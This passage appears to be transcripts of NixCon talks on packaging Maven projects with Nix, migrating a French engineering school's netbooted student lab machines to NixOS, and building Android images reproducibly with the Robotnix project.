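  # Start with a fake hash; the first build fails and reports the
  # real hash, which you paste in here.
  outputHash = lib.fakeSha256;
}
```

The resulting store path is then used to rehydrate the second invocation, something like `mvn package --offline -Dmaven.repo.local=${deps}/.m2`, so the real build never touches the network.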
And I think there are some improvements to be made that I'm submitting as well, plus there's a lack of documentation. It tries to fit the pattern we see other tools and language support doing: it generates a lock file and uses the link-farm pattern. But it only goes as far as actually generating a jar, which is fine for a library; but if you're a service author or an app author, you want to get to a runnable artifact. Okay, sorry, we'll go through this quickly. Maybe just to show how intricate Maven is, I have a screenshot here. The pom.xml is like package.json or something similar in other languages; this is how you define a project. This is the most empty project you can write: I just have the name of my project, no dependencies, nothing. I then take this and use the Maven-to-Nix plugin to generate the lock file, which they call project-info.json. What I thought was great, and where Nix is great, is making you hyper-aware of the dependencies you need to build that were previously so implicit. Just an empty project here pulls 257 jars and 640 items, essentially, into my Nix store, plus some other metadata. That was kind of eye-opening for me: what you need just to start off with an empty project. The bottom photo here shows the link farm it builds, so it's still following the pattern of other language tools: still flattened, just a one-level-deep tree. This next one is a pretty good pattern I wanted to share. If you want to make the jar actually runnable, it's pretty easy to do. Jars can self-describe their classpath, which is where they load their libraries from, and in Maven you can use a plugin to modify that manifest and dictate the dependencies. So all you need to do is put a little snippet like this, where we're saying: add to the classpath all the dependencies in my project.
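For reference, the "most empty project you can write" mentioned above looks roughly like this; the group and artifact coordinates here are made-up placeholders, since the actual slide isn't reproduced in the transcript:

```xml
<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <!-- Illustrative coordinates: no dependencies, nothing else. -->
  <groupId>com.example</groupId>
  <artifactId>empty-project</artifactId>
  <version>1.0</version>
</project>
```

Even this empty POM, run through the Maven-to-Nix plugin, yields a project-info.json lock file listing the hundreds of jars Maven itself needs to bootstrap a build.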
The prefix is going to be lib, relative to where the jar is, which is great because we want it relative, since it's going to be in the Nix store. And the layout type is repository, which is also great, because that's the Maven repository layout format, which we had already built just to build the jar in the first place. So all you do is take that repository, link it into lib, and copy your jar out. And I make a little wrapper to run it, so you can just run a little script that starts up your jar, loads it via your classpath, and you're in business. I guess the little downside at the moment is that I've added quite a lot more to my classpath than I need: I've added all the libraries needed to actually build the jar. So there are some improvements to be made here to slim the repository down to just what you need at runtime. So, kind of looking forward, I would love to meet and contribute with others working on Nix and Java. I showed earlier how popular Java is, so it's surprising to hear so little from the community. I think Nix is great in having a really vibrant Haskell community and some other languages, so I'd love to see something align more with how popular Java is. This is kind of just the surface, and I've only covered Maven, but the Java ecosystem, or I guess JVM-based languages, is pretty fragmented: there's Gradle, sbt for Scala, Leiningen for Clojure. So what's a way to build a really cohesive story around all these tools so they work together? Because fundamentally they're all building jars, and they run the same way. I think there's an interesting opportunity to also build patterns that use jlink, a tool that, rather than having to distribute the whole Java runtime, builds a small runtime image, a native image, which would be pretty cool. And, you know, help me out and look for other contributors.
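The manifest snippet being described matches the standard maven-jar-plugin archive configuration; something along these lines (plugin version omitted, and treat this as a sketch rather than the exact slide):

```xml
<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-jar-plugin</artifactId>
  <configuration>
    <archive>
      <manifest>
        <!-- List every dependency on the jar's Class-Path... -->
        <addClasspath>true</addClasspath>
        <!-- ...prefixed with lib/ relative to the jar... -->
        <classpathPrefix>lib/</classpathPrefix>
        <!-- ...laid out in the Maven repository format. -->
        <classpathLayoutType>repository</classpathLayoutType>
      </manifest>
    </archive>
  </configuration>
</plugin>
```

With this in place, symlinking the Nix-built Maven repository to `lib/` next to the jar is enough for `java -jar` to resolve everything, which is why a tiny wrapper script suffices to make the artifact runnable.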
I'm adding language support documentation for Maven to Nixpkgs, and we'll continue to help improve the story here. So that's my talk, and I just wanted to thank the Nix community and the NixCon committee for making all this possible. Thank you. Yeah, I definitely appreciate that. Okay, it seems we have at least one question for you. (Sorry, I'm getting some really bad audio feedback; very disorienting. I will try to make do.) It's from nixnut: any experience with Gradle and Nix? I haven't yet. I was looking into it to try as I'm adding documentation, and I actually see that Gradle has a plugin to generate a lock file, which I was claiming Maven doesn't have natively. So I actually think the story there will be much better. But there's the second half: building your Maven repository, because that's what all these JVM tools still use. It doesn't matter what the top-level tool is; many of them rely on the Maven repository layout and that kind of federated way to distribute packages. So unifying that final piece of building the jar and making it runnable is what I'm interested in as well. Okay, sorry, the feedback I was getting is gone now, so I can pick up again; I'm very sorry about that. I don't believe we have any more questions for you, so thank you very much for your talk. Yeah, thanks everyone. I appreciate it.
Java is one of the most popular languages (ranked 2nd by PYPL [1]); however, the tooling available in Nixpkgs for it is fragmented and incomplete. This talk will go over the current state of affairs (what's available today), what's so difficult about Java compared to other supported languages in Nixpkgs, and a proposed solution (mvn2nix [2]) aimed at filling the gap. Submission outline: - discuss how other languages integrate with Nix, mainly by creating fixed-output derivations for their dependencies, which are fetched to construct a build environment. - communicate that Java's main build systems (Maven & Gradle) go far beyond simple dependency retrieval: they generate sources or even do bytecode weaving. - touch on Maven specifically, whose initial release was in 2004. The tool is immensely complex, and it is non-trivial to determine all the necessary dependencies. - go over the "double invocation" pattern as a workable solution. - announce / release mvn2nix as a forward-looking solution.
10.5446/50711 (DOI)
Okay, the next talk up is Bringing NixOS to My School by Mark Schmidt. This presentation will start with the current state of their learning infrastructure running on Arch Linux and the challenges they faced with it, the ups and downs of migrating to NixOS, and what has already been done. The school this is about is EPITA, a French school of engineering in computer science, and it's bringing NixOS to its students. So this is going to be a presentation showing the challenges of maintaining an infrastructure of more than 800 machines used by students. They started using NixOS a year and a half ago when they were in California for a school trip, which is pretty cool, and they wanted a way to manage config with git. Like a lot of people, Mark tried Ansible first, then found NixOS, and I will say that NixOS is much better than Ansible for this kind of thing. He is also an organizer at Prologin, the French national computer science contest. And a cool thing we share in common is that, like me, he's a musician: he plays viola, and has done so for 14 years now. Okay, take it away. Right, so first I'd like to thank the organizers for their work; what they're doing is terrific. As was said, I'm at EPITA, a student in my fourth year. I'm part of a laboratory called the CRI, which stands for Centre des Ressources Informatiques, roughly "IT resources center" in English. We're the school department in charge of managing the educational IT needs, which means anything from hosting Moodle to managing the computer rooms, and the computer rooms are what I will be talking about today. Right, so we'll skip over that. So EPITA is still a school that has computer rooms much like this one.
This photo actually isn't accurate anymore, because now we have screens that stand on top of the tables rather than inside them, and we are using Intel NUCs as our computers, attached behind the screens. It's very, very convenient. However, the CRI does not manage everything in those computer rooms. Indeed, EPITA is part of a group of schools, IONIS, that tries to pool needs, especially in IT. The department responsible for that is called the Bocal, and they manage everything from phones, Office 365 accounts and Wi-Fi to our computer rooms' network. This means that we actually have some imposed requirements when managing the computers in those rooms. Our computers used to not have any disk, which meant that we had to boot the machines over the network. However, our computer rooms only have a one-gigabit uplink each, and since we have 13 computer rooms across six campuses in France, booting all the machines at the same time would just kill our server room uplink, which is also one gigabit. So what we do is have our initramfs download the root FS using aria2, so BitTorrent; that way we don't have to download everything for every machine from our server room. As I said, we have 13 computer rooms, which adds up to about 800 to 1000 machines, which probably makes it the biggest IT infrastructure running Arch Linux in France, maybe Europe. And to give students some persistence for their files on those machines, we're using Kerberos for authentication on OpenAFS. For those who don't know what OpenAFS is, it's basically a network file system that you log into using Kerberos; only you can see your files, unlike with NFS. We also have several images that the computers can boot from. We do that because depending on what year you're in at EPITA, you're going to be working with different software, and we don't want to include all the software used at EPITA in one image.
It would just be too big; right now our images are about 2 GB in size, so all the software would be way too much. So currently our boot process goes like this. The machines are configured to PXE boot by default. They get their IP from the switches in the computer rooms, which forward the DHCP requests to our servers. In the DHCP response, our servers tell the computers to download iPXE from our servers via TFTP. iPXE then queries a menu from a homemade service that manages iPXE menus, which allows us to select a default image for a room depending on which year, which promotion of students, is going to be using it. Once the image has been selected, iPXE downloads the kernel and initramfs via HTTP from our S3 servers. The initramfs then downloads a torrent file via HTTPS; it finds which torrent file to download from the kernel command line. In this torrent there is a root FS squashfs, which it downloads, mounts, and switch-roots onto. If the computer has a disk (our old computers didn't have one, but the Intel NUCs do), we can actually do some boot caching: we have a partition in which we store the torrent file and its contents, so the machine doesn't have to re-download the image if it hasn't changed since it was last downloaded. Also, once a machine is booted up, there's a service that seeds those images: a booted machine is capable of seeding its own image and also any other images it has downloaded before. Okay, so how do we build an image? As I said previously, we use Arch Linux. We use dracut for our initrd because it's quite convenient, easily customizable, and it just works. We use Salt to manage our configuration and which packages are going to be installed on the machine or in the image, plus some custom tools including arch-creator, which is basically a script to bootstrap an image.
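The chain just described can be pictured as a small iPXE script; the hostnames, paths and the `torrent=` argument name here are purely illustrative placeholders, not EPITA's actual configuration:

```shell
#!ipxe
# Served by the homemade menu service after the DHCP/TFTP handshake;
# the menu decides which image these URLs point at.
kernel http://images.example.edu/arch/vmlinuz torrent=https://images.example.edu/arch/rootfs.torrent
initrd http://images.example.edu/arch/initramfs.img
boot
```

The initramfs then reads the `torrent=` value off the kernel command line, fetches the torrent over HTTPS, downloads the squashfs root FS via aria2, mounts it and switch-roots.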
So the first step is what you would do in any classic Arch Linux installation, that's packstrap a root FS with some basic software. The second step we do is we install Salt. We actually have to pin this Salt version for a very simple reason. The current Salt version in Arch Linux repositories is broken, so we have to install our own. And then we have to patch system, well actually system CTL because the latest version of Salt doesn't support the latest version of system D that's shipped with Arch Linux. So we actually have to hack the output of system CTL-Version to remove that version and replace it with a version supported by Salt. Otherwise, Salt will just not start. Which is what we do just right here. Salt call and the important part is this, state of high state. What that does is Salt is going to create Saltmaster, which then looks in a Git repository on the master branch and applies a configuration on your current system, which in this case is a root FS, so we're inside a shoot right here. And then we undo our hack, we install some kernel modules, we generate our initRT using drag cuts, and then we create a squash FS with everything that we've done just here. Okay, so this setup actually has a few problems. First it's not reproducible for a very simple reason. Every time we start an image build, we don't know what packages are going to be installed because well, Arch Linux is a rolling release, so they just release packages whenever they want. So we would just install what's latest in the Arch Linux repositories. We could actually pin all those packages to a version, but there would just be too much maintenance for not much result. So we just hope that every time we rebuild an image, everything just goes fine. Salt is a pain because of what we've seen just before. It's also very hard to test the changes we do on these images. Right now we have two ways of testing changes. The first one is to push on a branch on our soltrapestory, build the image. 
We usually have an image called Arch Linux test for this purpose. Once the image is built, which takes somewhere between 20 and 60 minutes, we can start a machine using this image; downloading it, depending on where you are in the school and how good your connection is, can take between 2 and 15 minutes. So you're in for somewhere between 30 minutes and an hour and a half before you can actually test your changes, which makes it very hard to iterate on any configuration change you're making. The second way to test changes is to commit to master on our Salt repository, of course, then go on an already-booted machine and run salt-call state.highstate, which queries the configuration the machine should have from its Salt master and applies it to the system. Then we can test it, which is pretty fine, but again, pushing to master is not great. And you can't test everything: if you make any changes to a systemd unit that gets loaded at startup, you can't test that, for example. CI takes forever, as I said, and we also don't have any package cache, which is probably why CI takes forever; we've had no time to implement one, and as far as I know it's not very trivial. So there's quite a running gag in our team that says: if we switch to NixOS, it's going to solve all our problems and everything is going to be fine, everything is going to be fine right after that. And I, well, actually decided to go and find out. I mainly got inspired by the netboot configuration in Nixpkgs, and then basically hacked on it; you can find everything here. The two things I needed to add on top of the netboot configuration were torrent downloading, which is basically putting aria2 in the initrd and launching the command here, and boot cache support, which is basically checking whether a partition exists, as I do right here, and if it does, mounting it.
If that fails, we just mount a tmpfs so the image can still seed the torrent file. Right. You might wonder: how do I get the init file? In a standard NixOS installation you would have a kernel command line argument init that equals something like /nix/store/<hash>-nixos-system-.../init. But the thing is, to add that in our current setup, I would have to add an API route on our image-management service to update this path, and I just couldn't be bothered. So I did something that's a bit of a hack and frankly not quite satisfying. When I'm creating my squashfs, the closure info, which is basically everything that has to go into the image, comes from a store contents list containing config.system.build.toplevel. I also have to put the Nix path registration in my squashfs, and then when the system boots up I run nix-store --load-db and everything is registered. Then I echo config.system.build.toplevel plus /init, which evaluates to something like /nix/store/<hash>-nixos-system-whatever/init, into a stage2Init file, and that file ends up in the squashfs. Then in my initrd, when I'm done mounting everything, meaning my Nix store is mounted, just before switching to stage 2, I export this stage2Init variable, the variable that's usually set when stage 1 parses the kernel command line arguments: if init is provided, stage2Init is set to that value. Here I just set it to whatever is in /nix/store/stage2Init, which comes from here. There's actually a better way of doing this: I should generate an iPXE script, which is what's done in the netboot module in Nixpkgs and is the right way of doing it, and then upload that iPXE script to the S3 where things get downloaded from.
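A minimal sketch of the squashfs-contents hack being described, using Nixpkgs' closureInfo helper; the derivation name and file layout are assumptions for illustration, not the speaker's actual code:

```nix
# Bake the system closure, the Nix DB registration, and the stage-2
# init path into the material that becomes the squashfs.
{ pkgs, config, ... }:
let
  closure = pkgs.closureInfo {
    rootPaths = [ config.system.build.toplevel ];
  };
in
pkgs.runCommand "squashfs-contents" { } ''
  mkdir -p $out
  # Registration file, loaded at boot with `nix-store --load-db`.
  cp ${closure}/registration $out/nix-path-registration
  # Path of the stage-2 init; read by the patched stage 1 and
  # exported as stage2Init instead of the usual init= kernel argument.
  echo ${config.system.build.toplevel}/init > $out/stage2Init
''
```

The interpolation `${config.system.build.toplevel}` is what forces the whole system closure into the squashfs's dependency set, so the store paths and the init path stay consistent by construction.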
Our image-management service, instead of providing a kernel and initrd to download, should then just chainload that script from our S3. I have to test it, but it should work, and it will probably be a better solution than this. So let's go over the list of problems we had before and see if we solved some. Not reproducible: well, Nix helps a lot with that, since we can pin our packages, which was the main problem we had before. However, my images are not yet fully reproducible. I noticed that when doing some tests to see if I could skip uploading an image to S3 when it hadn't changed, and some bits actually differed between two images built at separate times. I haven't had time to investigate, but the only thing it costs us is keeping the manual step of going into the GitLab UI and starting the job that uploads the images to S3, which we want to have anyway, so we don't care much about this. We're pinning Nixpkgs using flakes, so we only upgrade packages when we want. Salt is no longer a pain, because we now only use it to run commands across the machines of a computer room, not to build the system anymore. So that's better. It's no longer hard to test changes, because you can just run a nix build of config.system.build.vm and launch a VM, which takes about a minute, much better than the hour it could take before, and you can iterate on configuration pretty fast using that method. The VM is actually a bit broken right now because it won't accept my netboot configuration, but I just have to override that output and disable netboot; a detail. We now have a CI which only builds the top-level configuration and not what I call the netboot top level, which includes the squashfs and takes some time.
It gives you some feedback when you push to the repository on whether your configuration is valid and builds. The CI is pretty fast because it's only building a NixOS configuration, so it does not take very long. The squashfs part of the build, which is most of the build time, is separated into another job that's launched manually, as I said before, and that also uploads the images to our S3. And we now have a binary cache, which we set up in a few minutes, so we can cache our packages and our configuration. Now let's go over what this provides to our students, because what we've seen until now is what it helps us do; let's see what it allows our students to do. First, they can reuse our configuration. For example, our Kerberos and OpenAFS configuration is exported as a NixOS module in our flake, which means they can import it into their own configuration and use it from there. They don't have to reconfigure all the servers and everything themselves; they can just use ours, and if we update it, they stay up to date with it. Students can also install the same packages we have at school, which means they'll have the same environment as they would at school, which is also the environment used in the tests when we automatically grade their code. And on the computers at school they can install new packages: right now the only way they have is to download the source and compile it themselves, but because Nix is multi-user, they can actually install packages. So, what's done: netboot works; Kerberos and LDAP configuration, and thus OpenAFS support, works too; I've already included some packages needed for development by the students, I think only Python right now, with a bunch more to add later; and the CI for image deployment works too. What's left to do is some extensive testing with NixOS tests. I've never used them before, so I have to see how they work and whether they'll integrate with our workflow; that's some more work left to do.
I have to write some introductory blog posts for the students; I've already written one, explaining from the very basics what a package manager is, what its role is, how it does its job for a classic one, and then how Nix does it. I have to do some team training, because currently only two people in our team are proficient with Nix and NixOS. But if we want to use this in production as a long-term solution, we have to train the whole team so they get on board and know how it works. And then I have to write a small script to live-update the images: with Salt you could do a state.highstate, which you can't do anymore, so I have to find a way to update the images while they're running, which should be pretty simple, I guess. And what's next for this project? It will be on a one-year trial so the students can test it and provide us with feedback; we'll see how it goes, and maybe we'll do a full switch to NixOS. The last item here is just some blue-sky insanity of mine: maybe I could somehow share the Nix store between all the machines in a room. I don't know how I could do it, maybe using IPFS, I don't know how that works. But if one student installed a package and another one installed the same package, the second could just download it from the other computer instead of downloading it from cache.nixos.org. All right, I guess that's all from me. If there are any questions, I'll be happy to answer them; let me just switch to the Jitsi room. They just rebooted. Yep, live streaming is on. Okay, everyone, sorry about that; we had a slight technical difficulty with the stream and the Jitsi room, but we ironed that out. So this now enters the Q&A portion of the talk, and we have, I think, three questions, two of which are actually from the speaker who's up next. First one: have you tried to bring NixOS to the routers? Is there a plan to do so?
Sorry, to the routers, you said? Yeah, to the routers. Okay, so we don't actually have any plans for that; the only plan right now is to use it for the computers used by the students. Okay, gotcha. And what kind of network setup does EPITA have, or run? Well, what do you mean, network? Okay, so, well, it's quite complicated; basically, it's a mess. A computer room has a subnet. Our server room also has a subnet. The Bocal I spoke of at the beginning of my talk actually routes them for us, so I don't know exactly what goes on behind the scenes in their infrastructure, because I don't work on it. The only networking we have to manage is the one in our server room, so that's pretty basic, even though we have some weird stuff going on with the VLANs and all that. I'm not sure that answers the question; I have my eye on the NixCon QA channel if you want to follow up. So, yes, there is isolation, probably, but again, that's not something we do; that's the Bocal's job. Right. And someone just said you should not tell that to strangers. Okay. The next question we have is: if there is CI, what is it, and is it being used? So we're using GitLab's CI, because that's what was used up until now. We're not really planning to use Hercules or Hydra because, well, that just doesn't fit our flow currently. I'm not quite sure there's a way for them to automatically upload the outputs of builds: not the path in the Nix store, but its actual contents. You know, when you run nix-build you have a result symlink; I don't want to upload everything behind that symlink, I want to upload only, let's say, result/nixos-test.initrd, nixos-test.squashfs and nixos-test.kernel. I want to upload these three files fully to S3 with the same names, so I can actually update my image. So we're not currently planning on any Nix-focused CI system. Right. I've used Cachix for some things like that.
I'm not sure if it's entirely possible to do what you're doing with it, though; it might be worth looking into momentarily. Okay. I don't think I see any more questions in the channel. Right. Yeah, I think that concludes the Q&A session. Thank you so much. Thanks to you.
EPITA, a French school of engineers in computer science, is bringing NixOS to its students. Here is a presentation of the challenges of maintaining an infrastructure of more than 800 machines used by students. The presentation will start with a current state of our learning infrastructure running on Arch Linux, the challenges we face with it, the up- and downsides of migrating to NixOS and what has already been done.
10.5446/50712 (DOI)
Okay, hello. That was probably the briefest transition ever. So we have Daniel Fullmer, and his talk is called Robotnix: Build Android (AOSP) Using Nix. The topic of this talk is that Robotnix enables a user to build Android images using the Nix package manager. AOSP projects often come with long and complicated build instructions, requiring a variety of tools for fetching source code and executing an incredibly convoluted build. Some brief background about Daniel: he started using NixOS in 2015; he really liked the model and got into it right away. He recently graduated with a PhD from Yale in electrical engineering, focusing on control theory and distributed computation. He also started as chief scientist at Achilles Heel Technologies this year, and his interests outside NixOS are weightlifting and powerlifting. Take it away. So, Robotnix is a project I've been working on over the last year to year and a half, which aims to build Android, or more specifically the Android Open Source Project, using the Nix package manager. Before I get to Robotnix, I want to briefly describe how you might go about building Android by following the instructions on the android.com website. To begin, they recommend that you use Ubuntu 18.04, and like many projects they have you apt-get install a whole set of dependencies. Additionally, there's a tool you need called repo, or git-repo, which fetches the Android source code; this is a tool that manages the large collection of git repositories and git trees and puts them into a single source tree. To use it, you create a directory, run repo init and then repo sync, and download roughly, if I recall, 40 to 50 gigabytes worth of source code; you'll have to know the name of the git tag that corresponds to the latest Android release.
And finally, to build the code, specifically for the Google Pixel 3 XL, which has the code name crosshatch, you run the following three commands and then wait for a very, very long time. On my old computer it used to take roughly eight hours; I got a much faster computer that can do it in just over 30 minutes, but at the end of this process you'll have a number of build products under a certain subdirectory. So these are the instructions on the android.com website. However, there are a number of limitations to those instructions. For instance, the kernel and the Chromium webview included this way are pre-built versions checked into the source tree, so they're oftentimes out of date and don't correspond to the latest security release. The build will also be missing the proprietary vendor binaries required for your Android image to work on a real Pixel 3 device. And finally, this build wouldn't be signed with secure signing keys; it would actually be signed with a set of keys called test keys, which are just for development and testing. For all the issues I just mentioned, there's documentation on the internet about how to go about solving them, but it's not readily accessible and requires many more steps, especially for something like building the Chromium webview, which is an entirely different build system. In contrast, Robotnix aims to make this process much, much simpler. To build a Pixel 3 XL image, you just git clone the Robotnix URL and then run nix-build, passing a configuration argument where we select the crosshatch device, which corresponds to the Pixel 3, and choose the vanilla flavor of AOSP; then you can flash the resulting image after it finishes building.
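Collected into one snippet, the commands just described look roughly like this; the `-A img` attribute name is an assumption about how Robotnix exposes the flashable image, so check the project's README for the exact invocation:

```shell
git clone https://github.com/danielfullmer/robotnix
cd robotnix
# Build a vanilla AOSP image for the Pixel 3 XL ("crosshatch").
nix-build --arg configuration '{ device = "crosshatch"; flavor = "vanilla"; }' -A img
```

Everything else, fetching sources, pinned kernel and Chromium builds, vendor blobs, and signing setup, is handled inside the Nix expressions rather than by hand-followed instructions.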
So it's much, much simpler than the standard set of instructions for building Android, and it includes all the dependencies and handles all of the tricky complexities of integrating those projects. So you might ask why you would want to use Nix for this sort of thing. Nix in particular is very good at integrating all of the diverse build tools across these diverse project ecosystems, including Android, Chromium, and the Linux kernel. It also gives great guarantees around reliability and reproducibility. In particular, the default Nix sandbox ensures that your code depends only on explicitly defined inputs. Android 10 actually does a little bit of sandboxing in their builds now, with a tool called nsjail, which at least disables network access — that has been quite nice for the rest of the Android ecosystem, because it prevents a script from just going off and randomly downloading some source from somewhere else; you have to have everything at the beginning of the process. Additionally, Nix requires all of the build inputs to be hashed, so we can't sneak in any impurities through other means. So some of the broad goals of the Robotnix project: simplicity — I'd like it to be very simple to use; you shouldn't have to know anything about the Android build system or the Chromium build system in order to use Robotnix and build Android images. Additionally, I'd like to have some measure of customizability — I recognize that's somewhat in conflict with the goal of simplicity, but I hope we can walk a fine line between the two values. Another goal I have is reproducibility, and here I mean bit-for-bit reproducibility: if any two people build the same configuration, they should receive the exact same output, bit for bit.
There should be no difference between the output files. I'm also interested in authenticity — specifically the authenticity of the build inputs: that the source code comes from authentic sources, and in particular that those proprietary vendor binaries I talked about previously come from authentic sources, such as the vendor themselves. Additionally, I'm interested in security and privacy. Robotnix doesn't do anything particularly new in terms of security on Android, but we at least try to maintain the Android security model, with things like Android Verified Boot, for instance — this is in contrast to some other popular projects. And privacy: because we're building open-source Android images that don't include things such as the Google Play services, we potentially mitigate a number of privacy threats. So, returning to the goal of customizability: Robotnix uses a NixOS-style module system that allows us to select which options we want to enable or disable. Here I've included an example configuration, and I'll discuss some of these options, in terms of each of these modules, in the coming slides — modules including things like choosing which flavor to build, things we can do with Chromium and the webview, the Linux kernel, and others. As for the flavors Robotnix currently supports: we support vanilla AOSP — this is the source directly from android.googlesource.com, updated to the Android 11 release, which came out last month; it focuses on just the Google Pixel phones for now. We also support another Android project called GrapheneOS, which is a privacy- and security-focused project that does a lot of hardening of the Android operating system; it's also on Android 11 and focuses on Pixel phones.
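The example configuration he shows isn't reproduced in this transcript, but based on the modules he lists it would be an attribute set along these lines (option names are an approximation of what he describes — check the Robotnix documentation for the exact ones):

```nix
# Sketch of a Robotnix configuration using the module system described
{
  device = "crosshatch";          # which phone to build for
  flavor = "grapheneos";          # vanilla / grapheneos / lineageos
  webview.bromite.enable = true;  # build the system webview from a Chromium fork
  kernel.src = ./my-kernel;       # custom kernel source tree (illustrative)
}
```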
Finally, there's probably the most popular Android project, LineageOS, which I added a couple of months ago with what I call experimental support — I don't personally use LineageOS, so some of the LineageOS things might conflict with some of the Robotnix modules, and I haven't tested all the combinations yet. I believe it's still on Android 10 — I don't believe any devices are on Android 11 yet — but LineageOS has great support for a very large number of devices. I already talked a bit about how Robotnix builds Chromium and the Chromium webview from source. The Android System WebView is the component that allows Android apps to display web content, and it really is a necessary component of the Android system — you can't really build a usable Android image without a webview — so it's nice to be able to build it from source. In fact, we can build a couple of Chromium forks as well, including Bromite, which focuses on privacy, and Vanadium, which focuses on security. I also have options to enable custom Linux kernels: your kernel source can come from any other source tree, and you can easily patch the kernel that's included in the Android build. Additionally, we enable you to easily sign your build with your own custom-generated keys, so you can have a set of Android signing keys which you, and only you, control. These keys would be necessary for you to sideload updates or do over-the-air updates. In that way you control the software that runs on your phone: it has to be signed by keys that you control.
Additionally, Pixel phones have a very nice feature with regard to verified boot: a user-settable root of trust, which corresponds to your custom Android keys. This is all part of the verified boot methodology, where you have a read-only system image and any modifications to that image have to be signed by keys that are trusted at a very low level, below the bootloader even. There's also a module that lets you do over-the-air updates. There was an updater app from GrapheneOS which has been incorporated into Robotnix, and we allow you to set a custom URL that it can check for updates against. It needs to point to a directory containing those update files as well as some metadata, and we have a simple derivation that allows you to easily create such a directory. There's also a module for F-Droid, the free and open-source Android app repository. It comes with a privileged extension, which allows you to easily install apps without having to enable extra options like the "unknown sources" option — in the same way that Google Play doesn't have this restriction. Additionally, the privileged extension allows you to install updates in the background without having to manually click install on every single update you care about. There's also microG, which is a re-implementation of a number of Google's proprietary Android userspace apps and libraries — it re-implements parts of the Google Play services. A number of apps unfortunately require Google Play services to work, but I've tested that things like push notifications through microG work well in Robotnix.
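A sketch of what the signing and updater options might look like together (the option names follow the talk; the key path and URL are placeholders, not real values):

```nix
{
  # Sign with custom-generated keys instead of the AOSP test-keys
  signing.enable = true;
  signing.keyStorePath = "/var/secrets/android-keys";  # placeholder path

  # OTA updater checking a self-hosted directory of update files + metadata
  apps.updater.enable = true;
  apps.updater.url = "https://updates.example.com/";   # placeholder URL
}
```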
Finally, there's also a very nice backup system called Seedvault, which uses an internal backup API. On the Android images from Google you can back up application data to the Google cloud; Seedvault similarly allows you to back up application data to a USB drive or to a hosted Nextcloud or something like that. Then there are two more generic modules I want to briefly discuss, one of which allows you to easily add additional source directories to the build itself. Here I have an example of an extra directory: you just set a .src attribute, which can be the output of any other Nix derivation, and the output of that derivation will be included in the Android build. Additionally, I have a patches option, which allows you to very easily apply particular patches to these Android sub-projects. And because the Android source tree is so large — like I said, 40 or 50 gigabytes — and the default way this is done in Nix would copy all the source every single time you build Android, I have a little optimization that uses bind mounts to avoid copying the source every time. The flavors I talked about previously are implemented such that they mostly just set up the default sets of source directories. Finally, you can also include additional pre-built applications in the image. Here I'm adding an example application from some example.apk — and naturally this could also refer to the output of any other derivation, so if you had something that built an application, you could include it in a Robotnix image using this option. Many of the other modules, like Seedvault and microG, are actually implemented using this apps.prebuilt option: Seedvault, for instance, is built from source, produces an APK, and then we include that APK using this option.
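The two generic modules and the prebuilt-app option he describes might be used like this (a sketch; names and paths approximate the slides and are illustrative):

```nix
{
  # Include an extra source directory in the Android build;
  # .src can be the output of any other Nix derivation
  source.dirs."vendor/extra".src = ./vendor-extra;

  # Apply a patch to one of the Android sub-projects
  source.dirs."system/core".patches = [ ./my-fix.patch ];

  # Add a pre-built application to the image
  apps.prebuilt.example.apk = ./example.apk;
}
```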
I also have the ability to launch an emulator with an attached Robotnix-built image. Here we're selecting the x86_64 generic device and building an emulator you can run directly on your desktop. It's very nice for conveniently testing some of the other Robotnix options — if you want to check whether microG or Seedvault works, you can do it locally in an emulator. Next, there's the SDK. The Android SDK includes utilities like fastboot and adb, which are used for flashing your phone. Google publishes pre-built versions of the SDK, but they publish them under an additional SDK license. However, if you actually look at the code that goes into producing that SDK, it's mostly Apache- and GPL-licensed. In fact, the Robotnix project has a little subdirectory, the sdk subdirectory, and if you build the derivation in that directory it'll produce a full open-source SDK for Android — including things such as fastboot and adb — unencumbered by that SDK license, because it's built entirely from permissively licensed sources. Like I said, one of my goals was reproducibility, and Google actually does a fairly good job with reproducibility of Android builds. There are only a few small patches needed, mostly concerning things around signing, the target files, and some partition impurities. In the past few months I've verified that the output of Robotnix is actually bit-for-bit reproducible for both the Pixel 3 and the Pixel 1 on the vanilla flavor. For LineageOS we also have some patches to fix a few small non-reproducible components, and we've tested it to be reproducible on certain devices as well. A thing I'd really like to do at some point is have an automatically produced reproducibility report, kind of like the r13y report for the NixOS minimal ISO — I think it'd be very nice to have that for Robotnix as well.
The remainder of this talk is going to be some ideas for future work on Robotnix and more speculative things. One of the big limiting factors for building Android is the requirement that you have a fairly powerful computer and can fetch a lot of source code. Robotnix builds most of Android in a single very, very large derivation that executes the full Android build process, and on many machines that will take multiple hours — up to 8, 10, or 12, depending on what exactly you're building and how powerful your machine is. But once you've built this derivation, the signing step can actually be done in another very small derivation that just depends on the output of that large derivation. So you could do something like publish the output of that large derivation — a certain set of files called target files — on S3 or Cachix or any other Nix binary cache, and then allow users to depend on those pre-built target files but still sign them with their own locally generated Android signing keys. That would give them a lot of the benefits of customizability — still being able to control their own keys — without necessarily having to rebuild the entire thing themselves. Of course, there are some obvious downsides to that approach: the output is quite large, a bit over 3 gigabytes per build, and every possible configuration of Robotnix produces a different output. So if you wanted to make a build for every single combination of Robotnix options, you'd have an exponentially increasing number of builds for every new option you enabled. But maybe you could publish a smaller subset — say one or two configurations per device, perhaps a minimal configuration and a more full-featured configuration.
Here's a quite a bit more speculative thing that I'm quite interested in: if we know that the target-files output of Robotnix is bit-for-bit reproducible, we could have multiple independent builders, each producing its own unsigned target files, and then have them sign those with Nix binary cache keys. There are a couple of Nix subcommands that look quite interesting — I haven't looked into this in full detail yet, but you can do things like verify that a certain number of signatures apply to a particular derivation output. So instead of trusting a single build farm or build server, you could distribute that trust among a number of build servers and ensure that, so long as a certain threshold of those build servers build reproducibly and produce the same output, you can have a bit more confidence that the build servers are not compromised in a way that might produce malicious output. And of course, like I said, you can still sign this with your own local keys, so you still control the keys that determine what code runs on your device. The last thing is that the build takes place in one very large derivation, and changes to the Robotnix configuration often require a full rebuild. There are some things you can do, like ccache, but unfortunately it's insufficient for this purpose. If you could share some common intermediate build products between different configurations, maybe you could build things much more quickly — and I'll describe one somewhat ambitious attempt at solving this with a set of tools. To do that, I need to briefly describe how the Android build system works: in the old days it was entirely makefiles, but they've added a new build system called Soong — I'm not exactly sure how to pronounce it — based on what they call Blueprint files.
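The Nix subcommand he alludes to is `nix verify` — a sketch of checking that a store path carries signatures from at least two trusted keys (the store path and key strings are placeholders; flag spelling may vary between Nix versions):

```shell
# Require at least 2 signatures from trusted keys on the target-files output
nix verify --sigs-needed 2 \
  --option trusted-public-keys "builder1:AAAA... builder2:BBBB..." \
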